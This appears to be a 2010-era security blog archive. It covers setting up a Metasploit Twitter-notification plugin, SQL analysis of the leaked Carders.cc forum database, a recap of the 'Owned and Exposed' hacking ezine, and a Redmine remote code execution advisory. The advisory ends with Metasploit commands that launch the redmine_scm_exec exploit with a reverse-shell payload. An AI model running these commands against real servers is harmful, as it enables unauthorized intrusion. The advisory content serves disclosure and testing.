All posts by wow

Twitt Metasploit Plugin on Ubuntu

Metasploit

Twitt Metasploit plugin was developed, in ruby, by Carlos Perez, aka Dark Operator. This plugin permit you to send a Twitter direct message to a configured account when a Metasploit session is created or shutdown. Each message will contain informations about the related session.

Installation :

To install the Twitt Metasploit plugin on Ubuntu 10.04.1 LTS, you first need to update your Ruby Gem with the following commands (Thanks to Carlos, helping me to update gem).

sudo gem install rubygems-update
cd /var/lib/gems/1.8/bin
sudo ./update_rubygems

Then you will be install the needed Ruby Gem needed by the plugin.

sudo gem install twitter

After this, just download the twitt.rb script from Github and install the script in the Metasploit plugin directory, by default “/opt/metasploit3/msf3/plugins/“. Don’t forget to give the right user access to the script and launch Metasploit.

sudo msfconsole

Twitt plugin setup :

To setup the OAuth 1.0a plugin settings you first need a Twitter account, if you don’t have one. After you need to register the Twitt application in the Twitter Developers.

Don’t forget when you fill the form, to determine that the “Application Type” is “Client” and that the “Client” should have a “Read & Write” “Default Access Type“.

Twitter Developers Application Registration
Twitter Developers Application Registration

After the plugin registration on Twitter, you will need different configuration settings :

  • Consumer key for the Metasploit Twitt plugin “twitt_set_consumer_key” command.
  • Consumer secret for the Metasploit Twitt plugin “twitt_set_consumer_secret” command.
  • Access Token (oauth_token) for the Metasploit Twitt plugin “twitt_set_oauth_token” command.
  • Access Token Secret (oauth_token_secret) for the Metasploit Twitt plugin “twitt_set_oauth_token_secret” command.
  • Your Twitter username account for the Metasploit Twitt plugin “twitt_set_user” command.

In Metasploit load the plugin and configure it by the following commands :

Metasploit Twitt plugin loading
Metasploit Twitt plugin loading
Metasploit Twitt plugin configuration
Metasploit Twitt plugin configuration

Just replace all the screenshot configuration settings with your settings 🙂

Then save the configuration with the “twitt_save” command :

Metasploit Twitt configuration saving
Metasploit Twitt configuration saving

As you can see all the configuration settings are save into a “.yaml” file.

If you want to see all the configuration settings from the “.yaml” file just type the “twitt_show_parms” command.

Metasploit Twitt plugin parameters
Metasploit Twitt plugin parameters

Then to start the twit plugin, run “twitt_start” command.

Metasploit Twitt plugin starting
Metasploit Twitt plugin starting

Now each time you will have a new Metasploit session, or if a session is shutdown, a direct message will be send to the configured twitter account. Here under a demonstration video.

Owned and Exposed Episode 2 – Carders.cc database forensic

Various,

As written in my previous blog post, Carders.cc database is in the wild and the database content give you interesting informations.

First we will take a look to the “user” table. This table content 8 425 entries with a first registration date the “Sep-17-2008 16:09” and the last registration date the “Dec-06-2010 00:12“. Actually we can suppose that the dump was made the 6 December, and that the server was owned before the 6 December.

With a simple SQL query we will export a CSV file in order to create a Google visualization gadget for the number of registrations (joindate table field) by day’s.

SELECT date(from_unixtime(joindate)) as bydate, count(*) as byday
FROM user
group by bydate order by bydate asc

Here  you will get the Google visualization result, in the “UsersRegistrations1” tab.

As you maybe remember Carders.cc was the target of the “Owned and Exposed” team at the beginning of May 2010. The complete site was “rm’ed“. But as you can see that the 22 May, the website was back online and the registrations have re-begin. Also you can see a second pick of registrations beginning the 23 October.

Now we will check the lastvisit table field how represent the timestamp of the users lastvisits. The first lastvisit date is the “May-25-2010 00:05” and the last one the “Dec-06-2010 00:12“. Here we can see that the Carders.cc had a backup of the forum database before the “rm’ed” of the server by the “Owned and Exposed” team. Some Carders.cc users how had register before the May 2010, have continu to use the same account after the restoration of the forum, for example KRON0S and Vitali.

Also with a SQL query we will export all the lastvisits timestamp to get an overview of last visits by day’s.

SELECT date(from_unixtime(lastvisit)) as bydate, count(*) as byday
FROM user
group by bydate order by bydate asc

Here you will get the Google visualization result, in the “UsersLastVisits1” tab.

You can see a pick of visits beginning the 2 to the 5 December. An abnormal activity how should be investigated into another post. The pick of new registrations between the 23 October to the 14 November is surely related.

To see the real number of users how have join Carders.cc forum since the May restoration of the forum, we will execute this query.

SELECT count(*) FROM `user` WHERE `joindate` > '1274738400'

And the result is 6 700 new users. So before the May “rm’ed” we got only 1 725 active users. Is the buzz around the first “Owned and Exposed” hack the reason of the crazy increase number of users ? We could think that the buzz had work, and that a lot of people how didn’t know Carders.cc before the May hack, have discover and join this community after the “Owned and Exposed” hack.

To have a clear view of the number of new registrations by day’s after the May 2010 hack, we will execute a new query and create another Google visualization in “UsersRegistrations2” tab.

SELECT date(from_unixtime(joindate)) as bydate, count(*) as byday
FROM user
WHERE joindate > '1274738400'
group by bydate order by bydate asc

Clearly you can see that directly after the forum restauration, the number of new registration by day’s have increase comparing to the pre May 2010 hack. Before May 2010, 1 725 users in 591 day’s, so an average of 2,9 new users per day. After May 2010, 6 700 users in 166 day’s, so an average of 40,6 new users per day.

Just to be fair we will do the same calculation from the 25 May to the 23 October just before the registration pick.

SELECT count(*) FROM user WHERE joindate between '1274738400' and '1287784800'

We have 4068 users in 152 day’s, so an average of 26 new users per day. What is interesting is to see that after the 23 October registration pick we have 2632 new users in 42 day’s, so an average of 62,66 new users per day ! The 23 October registration pick is really confirmed as an abnormal forum lifecycle.

Carders.cc could say’s thank you to “Owned and Exposed” team for the buzz created by the hack, having before the May 10 hack an average of 2,9 new users per day, and after the hack an average of 26 new users per day.

Owned and Exposed Episode 2, Exploit-DB.com, BackTrack-Linux.org, Carders.cc, Ettercap and Inj3ct0r.

Various,
What a unexpected Christmas present provided, by the identified “Security Watchmen“, to Carders.cc, a criminal forum specialized in trading stolen credit cards, but also to some well know security scene actors such as Exploit-DB.com, BackTrack-Linux.org, Ettercap, Inj3ct0r.com and Free-Hack.com.
The ezine “Owned and Exposed“, how begin to fear security experts, has release his second edition. The previous edition of this online magazine, dating from May 2010, had already targeted Carders.cc and revealed technical and organizational details of this group of pirates.
 
Contents of this second edition :
  • Carders.cc “Owned and Exposed”
The authors of the magazine wanted, when editing the first edition of their magazine, to give a fatal blow to Carders.cc in order to stop their criminal activities. Unfortunately, the attack of May 2010, was not sufficient to stop this forum how came back online few time after to be “rm’ed“. Seven months later, Carders.cc is again a prime target.
 
 
All depths of the server hosting the forum Carders.cc are exposed in the magazine, and all administrative accounts are revealed. A copy of the forum database is currently available on Internet. The “Security Watchmen” hoping that this time the message is gone, and that we could see the definitive end of the criminal forum Carders.cc. Otherwise, it is clear that the forum will again be the target in the third edition of the “Owned and Exposed” magazine.
  • Inj3ct0r “Owned and Exposed”
Inj3ct0r, for those who do not know this site is a copy of Milw0rm, offering a database of 0day’s and exploits. “Security Watchmen” motivation to attack Inj3ct0r is based primarily on the fact that Inj3ct0r is considered as “lameass wannabe milw0rm kid“, how reveal only XSS attacks (how are considered as low level attacks by the “Security Watchmen“), but also that behind this facade of exploits database a business based on stolen credit card is actually done by Inj3ct0r team.
 
 
Again all the depths of the server hosting Inj3ct0r are exposed in the magazine, and all administrative accounts are revealed. A copy of the website database is currently available on the Internet.
  • Ettercap “Owned and Exposed”
Ettercap is a software to perform MITM attacks (Man in the Middle). This software exist since 2001 and is used by computer security experts. “Security Watchmen” motivation to attack Ettercap is based primarily on the fact that Ettercap software suite to be detrimental to the security community and that the team in charge of maintaining the software is considering themselves as security experts.
 
 
What is disturbing about this hack is that firstly, as the “Security Watchmen” suggest, the Ettercap source code is compromised for about 5 years, and secondly the fact that Ettercap website is hosted at SourceForge. We could assume that all projects hosted at SourceForge are potentially compromise !
 
Again the depths of the server hosting the Ettercap project are outlined in the magazine, and all administrative accounts are revealed. The list of processes running on the SourceForge server, how is hosting the Ettercap project, reveal that bots have upper hand on this server.
  • Exploit-DB and BackTrack Linux “Owned and Exposed”
Exploit-DB is a 0day’s and exploits database, BackTrack Linux is an operating system containing computer security software well used by security experts. “Security Watchmen” motivation to attack Exploit-DB and BackTrack Linux is based primarily on the fact that they think that such projects allow computer criminals to use new ways to commit crimes.
Again the depths of the servers hosting the Exploit-DB and BackTrack Linux are exposed in the magazine, and all administrative accounts are revealed. We should get some clarifications from the BackTrack Linux team on if the distribution was compromised or not.
These attacks targeting sites, well known from the computer security community, will surely create a sense of paranoia until the third edition of the electronic magazine “Owned and Exposed“.

OSVDB-70090 : Remote Code Execution for Redmine

Exploits, Metasploit

Timeline :

Vulnerability submitted by joernchen to Redmine the 2010-12-18
Vulnerability advisory and new package provided by Redmine the 2010-12-23
Metasploit exploit released the 2010-12-24

    PoC provided by :

joernchen

    Reference(s) :

OSVDB-70090

    Affected version(s) :

All versions of Redmine previous version 1.0.5, version 0.9.x included
redmine_1.0.4-1_all.deb on Debian Squeeze / Sid
redmine_1.0.4-1_all.deb on Ubuntu Lucid

    Tested on Ubuntu Lucid 10.04.1 LTS with :

    CVS as SCM

    Description :

joernchen has report a vulnerability, how could be classified as highly critical, for the project management web application Redmine, how could allow an attacker to compromise a vulnerable system.

The entries submitted to the “rev” parameter, from the “repository/annotate” script of a Redmine project, are not treated correctly before to be used. This error could be used to execute, remotely, arbitrary code on the vulnerable server.

The vulnerability affect principally the bazaar, cvs, darcs and mercurial SCM adapters. The code will be executed with the privileges of the user running the  project management web application Redmine (for example www-data).

The vulnerability has been confirmed for all versions previous version 1.0.5. The supplier propose an update to correct this vulnerability.

    Commands :

use exploit/unix/webapp/redmine_scm_exec
set RHOST 192.168.178.21
set URI /redmine/projects/project2/
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.178.21
exploit

id
uname -a
/sbin/ifconfig